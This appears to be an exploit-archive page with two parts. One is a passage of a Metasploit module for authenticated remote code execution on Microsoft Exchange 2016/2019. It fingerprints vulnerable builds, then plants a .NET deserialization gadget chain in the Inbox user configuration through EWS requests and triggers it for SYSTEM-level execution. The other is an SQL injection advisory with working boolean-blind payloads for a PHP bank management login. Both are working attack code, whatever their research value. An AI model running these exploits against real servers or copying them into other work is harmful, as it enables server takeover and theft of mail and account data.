OptString.new('HttpUsername', [true, 'The username to log into the Exchange server as', '']),<br /> OptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server', ''])<br /> ])<br /> end<br /><br /> def post_auth?<br /> true<br /> end<br /><br /> def username<br /> datastore['HttpUsername']<br /> end<br /><br /> def password<br /> datastore['HttpPassword']<br /> end<br /><br /> def vuln_builds<br /> # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019<br /> [<br /> [Rex::Version.new('15.1.2308.8'), Rex::Version.new('15.1.2308.20')], # Exchange Server 2016 CU21<br /> [Rex::Version.new('15.1.2375.7'), Rex::Version.new('15.1.2375.17')], # Exchange Server 2016 CU22<br /> [Rex::Version.new('15.2.922.7'), Rex::Version.new('15.2.922.19')], # Exchange Server 2019 CU10<br /> [Rex::Version.new('15.2.986.5'), Rex::Version.new('15.2.986.14')] # Exchange Server 2019 CU11<br /> ]<br /> end<br /><br /> def check<br /> # First lets try a cheap way of doing this via a leak of the X-OWA-Version header.<br /> # If we get this we know the version number for sure and we can skip a lot of leg work.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/owa/service')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> if res.headers['X-OWA-Version']<br /> build = res.headers['X-OWA-Version']<br /> if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }<br /> return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")<br /> else<br /> return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")<br /> end<br /> end<br /><br /> # Next, determine if we are up against an older version of Exchange Server where<br /> # the /owa/auth/logon.aspx page gives the full version. Recent versions of Exchange<br /> # give only a partial version without the build number.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body))<br /> if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }<br /> return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")<br /> else<br /> return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")<br /> end<br /> end<br /><br /> # Next try @tseller's way and try /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application<br /> # URL which if successful should provide some XML with entries like the following:<br /> #<br /> # <assemblyIdentity name="microsoft.exchange.ediscovery.exporttool.application"<br /> # version="15.2.986.5" publicKeyToken="b1d1a6c45aa418ce" language="neutral"<br /> # processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" /><br /> #<br /> # This only works on Exchange Server 2013 and later and may not always work, but if it<br /> # does work it provides the full version number so its a nice strategy.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> if res.code == 200 && res.body =~ /name="microsoft.exchange.ediscovery.exporttool" version="\d+\.\d+\.\d+\.\d+"/<br /> build = res.body.match(/name="microsoft.exchange.ediscovery.exporttool" version="(\d+\.\d+\.\d+\.\d+)"/)[1]<br /> if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }<br /> return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")<br /> else<br /> return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")<br /> end<br /> end<br /><br /> # Finally, try a variation on the above and use a well known trick of grabbing /owa/auth/logon.aspx<br /> # to get a partial version number, then use the URL at /ecp/<version here>/exporttool/. If we get a 200<br /> # OK response, we found the target version number, otherwise we didn't find it.<br /> #<br /> # Props go to @jmartin-r7 for improving my original code for this and suggestion the use of<br /> # canonical_segments to make this close to the Rex::Version code format. Also for noticing that<br /> # version_range is a Rex::Version object already and cleaning up some of my original code to simplify<br /> # things on this premise.<br /><br /> vuln_builds.each do |version_range|<br /> return CheckCode::Unknown('Range provided is not iterable') unless version_range[0].canonical_segments[0..-2] == version_range[1].canonical_segments[0..-2]<br /><br /> prepend_range = version_range[0].canonical_segments[0..-2]<br /> lowest_patch = version_range[0].canonical_segments.last<br /> while Rex::Version.new((prepend_range.dup << lowest_patch).join('.')) <= version_range[1]<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, "/ecp/#{build}/exporttool/")<br /> )<br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /> if res && res.code == 200<br /> return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")<br /> end<br /><br /> lowest_patch += 1<br /> end<br /><br /> CheckCode::Unknown('Could not determine the build number of the target Exchange Server.')<br /> end<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :win_cmd<br /> execute_command(payload.encoded)<br /> when :win_dropper<br /> execute_cmdstager<br /> when :psh_stager<br /> execute_command(cmd_psh_payload(<br /> payload.encoded,<br /> payload.arch.first,<br /> remove_comspec: true<br /> ))<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Get the user's inbox folder's ID and change key ID.<br /> print_status("Getting the user's inbox folder's ID and ChangeKey ID...")<br /> xml_getfolder_inbox = %(<?xml version="1.0" encoding="utf-8"?><br /> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br /> <soap:Header><br /> <t:RequestServerVersion Version="Exchange2013" /><br /> </soap:Header><br /> <soap:Body><br /> <m:GetFolder><br /> <m:FolderShape><br /> <t:BaseShape>AllProperties</t:BaseShape><br /> </m:FolderShape><br /> <m:FolderIds><br /> <t:DistinguishedFolderId Id="inbox" /><br /> </m:FolderIds><br /> </m:GetFolder><br /> </soap:Body><br /> </soap:Envelope>)<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),<br /> 'data' => xml_getfolder_inbox,<br /> 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /><br /> unless res&.body<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')<br /> end<br /><br /> xml_getfolder = res.get_xml_document<br /> xml_getfolder.remove_namespaces!<br /> xml_tag = xml_getfolder.xpath('//FolderId')<br /> if xml_tag.empty?<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')<br /> end<br /> unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')<br /> fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')<br /> end<br /> change_key_val = xml_tag.attribute('ChangeKey').value<br /> folder_id_val = xml_tag.attribute('Id').value<br /> print_good("ChangeKey value for Inbox folder is #{change_key_val}")<br /> print_good("ID value for Inbox folder is #{folder_id_val}")<br /><br /> # Delete the user configuration object that currently on the Inbox folder.<br /> print_status('Deleting the user configuration object associated with Inbox folder...')<br /> xml_delete_inbox_user_config = %(<?xml version="1.0" encoding="utf-8"?><br /> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br /> <soap:Header><br /> <t:RequestServerVersion Version="Exchange2013" /><br /> </soap:Header><br /> <soap:Body><br /> <m:DeleteUserConfiguration><br /> <m:UserConfigurationName Name="ExtensionMasterTable"><br /> <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" /><br /> </m:UserConfigurationName><br /> </m:DeleteUserConfiguration><br /> </soap:Body><br /> </soap:Envelope>)<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),<br /> 'data' => xml_delete_inbox_user_config,<br /> 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /><br /> unless res&.body<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')<br /> end<br /><br /> if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}<br /> print_good('Successfully deleted the user configuration object associated with the Inbox folder!')<br /> else<br /> print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')<br /> print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')<br /> end<br /><br /> # Now to replace the deleted user configuration object with our own user configuration object.<br /> print_status('Creating the malicious user configuration object on the Inbox folder!')<br /><br /> gadget_chain = Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: :ClaimsPrincipal, formatter: :BinaryFormatter))<br /> xml_malicious_user_config = %(<?xml version="1.0" encoding="utf-8"?><br /> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br /> <soap:Header><br /> <t:RequestServerVersion Version="Exchange2013" /><br /> </soap:Header><br /> <soap:Body><br /> <m:CreateUserConfiguration><br /> <m:UserConfiguration><br /> <t:UserConfigurationName Name="ExtensionMasterTable"><br /> <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" /><br /> </t:UserConfigurationName><br /> <t:Dictionary><br /> <t:DictionaryEntry><br /> <t:DictionaryKey><br /> <t:Type>String</t:Type><br /> <t:Value>OrgChkTm</t:Value><br /> </t:DictionaryKey><br /> <t:DictionaryValue><br /> <t:Type>Integer64</t:Type><br /> <t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value><br /> </t:DictionaryValue><br /> </t:DictionaryEntry><br /> <t:DictionaryEntry><br /> <t:DictionaryKey><br /> <t:Type>String</t:Type><br /> <t:Value>OrgDO</t:Value><br /> </t:DictionaryKey><br /> <t:DictionaryValue><br /> <t:Type>Boolean</t:Type><br /> <t:Value>false</t:Value><br /> </t:DictionaryValue><br /> </t:DictionaryEntry><br /> </t:Dictionary><br /> <t:BinaryData>#{gadget_chain}</t:BinaryData><br /> </m:UserConfiguration><br /> </m:CreateUserConfiguration><br /> </soap:Body><br /> </soap:Envelope>)<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),<br /> 'data' => xml_malicious_user_config,<br /> 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /><br /> unless res&.body<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')<br /> end<br /><br /> unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}<br /> fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')<br /> end<br /><br /> print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')<br /><br /> # Deserialize our object. If all goes well, you should now have SYSTEM :)<br /> print_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...')<br /> xml_get_client_access_token = %(<?xml version="1.0" encoding="utf-8"?><br /> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br /> <soap:Header><br /> <t:RequestServerVersion Version="Exchange2013" /><br /> </soap:Header><br /> <soap:Body><br /> <m:GetClientAccessToken><br /> <m:TokenRequests><br /> <t:TokenRequest><br /> <t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id><br /> <t:TokenType>CallerIdentity</t:TokenType><br /> </t:TokenRequest><br /> </m:TokenRequests><br /> </m:GetClientAccessToken><br /> </soap:Body><br /> </soap:Envelope>)<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),<br /> 'data' => xml_get_client_access_token,<br /> 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /><br /> unless res&.body<br /> fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')<br /> end<br /><br /> unless res.body =~ %r{<e:Message xmlns:e="http://schemas.microsoft.com/exchange/services/2006/errors">An internal server error occurred. The operation failed.</e:Message>}<br /> fail_with(Failure::UnexpectedReply, 'Did not recieve the expected internal server error upon deserialization!')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Title: Bank Management System - MCB Bank v1.0 - SQLi<br /># Author: nu11secur1ty<br /># Date: 02.25.2022<br /># Vendor: https://www.campcodes.com/projects/php/ by:Tariq Fareeds<br /># Software: https://www.campcodes.com/projects/php/bank-management-system-in-php-mysql-free-download/<br /># Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System<br /><br /><br />## Description:<br />The email parameter from Bank Management System - MCB Bank v1.0<br />appears to be vulnerable to SQL injection attacks.<br />The payloads 30735302' or 9098=9098-- and 41995976' or 3071=3078--<br />were each submitted in the email parameter.<br />These two requests resulted in different responses, indicating that<br />the input is being incorporated into a SQL query in an unsafe way<br />WARNING: If this is in some external domain, or some subdomain<br />redirection, or internal whatever, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: email=-9337' OR 4870=4870-- Cgzq&password=q7A!t8j!H2&cashierLogin=<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/hvaaiu)<br /><br /></code></pre>